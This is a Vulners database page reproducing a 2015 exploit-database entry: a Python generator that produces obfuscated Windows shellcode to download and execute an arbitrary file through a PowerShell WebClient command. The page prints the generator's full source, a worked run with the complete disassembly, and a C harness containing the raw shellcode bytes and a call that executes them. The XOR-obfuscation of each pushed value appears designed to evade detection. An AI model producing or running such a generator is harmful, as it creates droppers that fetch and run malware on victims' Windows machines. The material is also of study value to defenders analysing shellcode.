Vulners
Lucene search
Win x86-64 - Download & execute Generator
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator
#length: Dynamic ! depend on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec => 0x77b1e695
#ExitProcess => 0x77ae2acf
#====================================
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"
#====================================
#Ali Razmjoo , ['[email protected]','[email protected]']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
####################################################
#How it work ?
'''
C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
Example: D:\file.exe
Enter:C:\Ali.exe
C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 41 41 65 22 push $0x22654141
8: 58 pop %eax
9: c1 e8 08 shr $0x8,%eax
c: c1 e8 08 shr $0x8,%eax
f: 50 push %eax
10: b8 34 47 0b 4d mov $0x4d0b4734,%eax
15: bb 5d 69 6e 35 mov $0x356e695d,%ebx
1a: 31 d8 xor %ebx,%eax
1c: 50 push %eax
1d: b8 43 32 10 22 mov $0x22103243,%eax
22: bb 79 6e 51 4e mov $0x4e516e79,%ebx
27: 31 d8 xor %ebx,%eax
29: 50 push %eax
2a: b8 60 05 42 32 mov $0x32420560,%eax
2f: bb 49 78 79 71 mov $0x71797849,%ebx
34: 31 d8 xor %ebx,%eax
36: 50 push %eax
37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax
3c: bb 6a 64 49 33 mov $0x3349646a,%ebx
41: 31 d8 xor %ebx,%eax
43: 50 push %eax
44: b8 07 3e 0b 40 mov $0x400b3e07,%eax
49: bb 46 52 62 6e mov $0x6e625246,%ebx
4e: 31 d8 xor %ebx,%eax
50: 50 push %eax
51: b8 44 0a 78 07 mov $0x7780a44,%eax
56: bb 63 49 42 5b mov $0x5b424963,%ebx
5b: 31 d8 xor %ebx,%eax
5d: 50 push %eax
5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax
63: bb 6a 31 67 2d mov $0x2d67316a,%ebx
68: 31 d8 xor %ebx,%eax
6a: 50 push %eax
6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax
70: bb 61 4c 39 67 mov $0x67394c61,%ebx
75: 31 d8 xor %ebx,%eax
77: 50 push %eax
78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax
7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx
82: 31 d8 xor %ebx,%eax
84: 50 push %eax
85: b8 45 40 41 66 mov $0x66414045,%eax
8a: bb 3d 78 77 49 mov $0x4977783d,%ebx
8f: 31 d8 xor %ebx,%eax
91: 50 push %eax
92: b8 02 1f 4b 45 mov $0x454b1f02,%eax
97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx
9c: 31 d8 xor %ebx,%eax
9e: 50 push %eax
9f: b8 24 3e 19 32 mov $0x32193e24,%eax
a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx
a9: 31 d8 xor %ebx,%eax
ab: 50 push %eax
ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax
b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx
b6: 31 d8 xor %ebx,%eax
b8: 50 push %eax
b9: b8 1f 37 40 24 mov $0x2440371f,%eax
be: bb 6d 52 32 41 mov $0x4132526d,%ebx
c3: 31 d8 xor %ebx,%eax
c5: 50 push %eax
c6: b8 2e 35 68 31 mov $0x3168352e,%eax
cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx
d0: 31 d8 xor %ebx,%eax
d2: 50 push %eax
d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax
d8: bb 67 6e 69 61 mov $0x61696e67,%ebx
dd: 31 d8 xor %ebx,%eax
df: 50 push %eax
e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax
e5: bb 4f 45 62 33 mov $0x3362454f,%ebx
ea: 31 d8 xor %ebx,%eax
ec: 50 push %eax
ed: b8 20 57 1d 45 mov $0x451d5720,%eax
f2: bb 47 78 63 36 mov $0x36637847,%ebx
f7: 31 d8 xor %ebx,%eax
f9: 50 push %eax
fa: b8 04 6a 24 3b mov $0x3b246a04,%eax
ff: bb 77 44 4b 49 mov $0x494b4477,%ebx
104: 31 d8 xor %ebx,%eax
106: 50 push %eax
107: b8 18 0f 0a 32 mov $0x320a0f18,%eax
10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx
111: 31 d8 xor %ebx,%eax
113: 50 push %eax
114: b8 7d 18 3c 27 mov $0x273c187d,%eax
119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx
11e: 31 d8 xor %ebx,%eax
120: 50 push %eax
121: b8 03 44 60 60 mov $0x60604403,%eax
126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx
12b: 31 d8 xor %ebx,%eax
12d: 50 push %eax
12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax
133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx
138: 31 d8 xor %ebx,%eax
13a: 50 push %eax
13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax
140: bb 6c 37 47 45 mov $0x4547376c,%ebx
145: 31 d8 xor %ebx,%eax
147: 50 push %eax
148: b8 59 07 12 0e mov $0xe120759,%eax
14d: bb 35 68 73 6a mov $0x6a736835,%ebx
152: 31 d8 xor %ebx,%eax
154: 50 push %eax
155: b8 01 59 11 2c mov $0x2c115901,%eax
15a: bb 45 36 66 42 mov $0x42663645,%ebx
15f: 31 d8 xor %ebx,%eax
161: 50 push %eax
162: b8 22 22 4e 5a mov $0x5a4e2222,%eax
167: bb 4c 56 67 74 mov $0x7467564c,%ebx
16c: 31 d8 xor %ebx,%eax
16e: 50 push %eax
16f: b8 00 37 1b 48 mov $0x481b3700,%eax
174: bb 43 5b 72 2d mov $0x2d725b43,%ebx
179: 31 d8 xor %ebx,%eax
17b: 50 push %eax
17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax
181: bb 64 48 47 71 mov $0x71474864,%ebx
186: 31 d8 xor %ebx,%eax
188: 50 push %eax
189: b8 6a 23 03 18 mov $0x1803236a,%eax
18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx
193: 31 d8 xor %ebx,%eax
195: 50 push %eax
196: b8 2d 54 57 1c mov $0x1c57542d,%eax
19b: bb 47 31 34 68 mov $0x68343147,%ebx
1a0: 31 d8 xor %ebx,%eax
1a2: 50 push %eax
1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax
1a8: bb 39 38 79 38 mov $0x38793839,%ebx
1ad: 31 d8 xor %ebx,%eax
1af: 50 push %eax
1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax
1b5: bb 79 57 51 61 mov $0x61515779,%ebx
1ba: 31 d8 xor %ebx,%eax
1bc: 50 push %eax
1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax
1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx
1c7: 31 d8 xor %ebx,%eax
1c9: 50 push %eax
1ca: b8 2c 18 08 54 mov $0x5408182c,%eax
1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx
1d4: 31 d8 xor %ebx,%eax
1d6: 50 push %eax
1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax
1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx
1e1: 31 d8 xor %ebx,%eax
1e3: 50 push %eax
1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax
1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx
1ee: 31 d8 xor %ebx,%eax
1f0: 50 push %eax
1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax
1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx
1fb: 31 d8 xor %ebx,%eax
1fd: 50 push %eax
1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax
203: bb 39 44 61 4f mov $0x4f614439,%ebx
208: 31 d8 xor %ebx,%eax
20a: 50 push %eax
20b: 89 e0 mov %esp,%eax
20d: bb 41 41 41 01 mov $0x1414141,%ebx
212: c1 eb 08 shr $0x8,%ebx
215: c1 eb 08 shr $0x8,%ebx
218: c1 eb 08 shr $0x8,%ebx
21b: 53 push %ebx
21c: 50 push %eax
21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx
222: ff d3 call *%ebx
224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx
229: ff d3 call *%ebx
C:\Users\Ali\Desktop>
#you have your shellcode now
=======================================
shellcode.c
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
=======================================
C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe
C:\Users\Ali\Desktop>shellcode.exe
Length: 173
C:\Users\Ali\Desktop>
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second
'''
import random,binascii
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
p1 = '''xor eax,eax
push eax
'''
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
'''
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
m = 0
for word in sen:
m += 1
m = m - 1
stack = ''
while(m>=0):
stack += sen[m]
m -= 1
stack = stack.encode('hex')
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8
c = 0
n = 0
z = 8
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')
while(c<m):
v = 'push 0x' + stack[n:z]
skip = 0
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'
if skip is 1:
shf.write(v)
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
shf.write(v)
n += 8
z += 8
c += 1
shf.write(p2)
shf.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Mar 2015 00:00Current
7.6High risk
Vulners AI Score7.6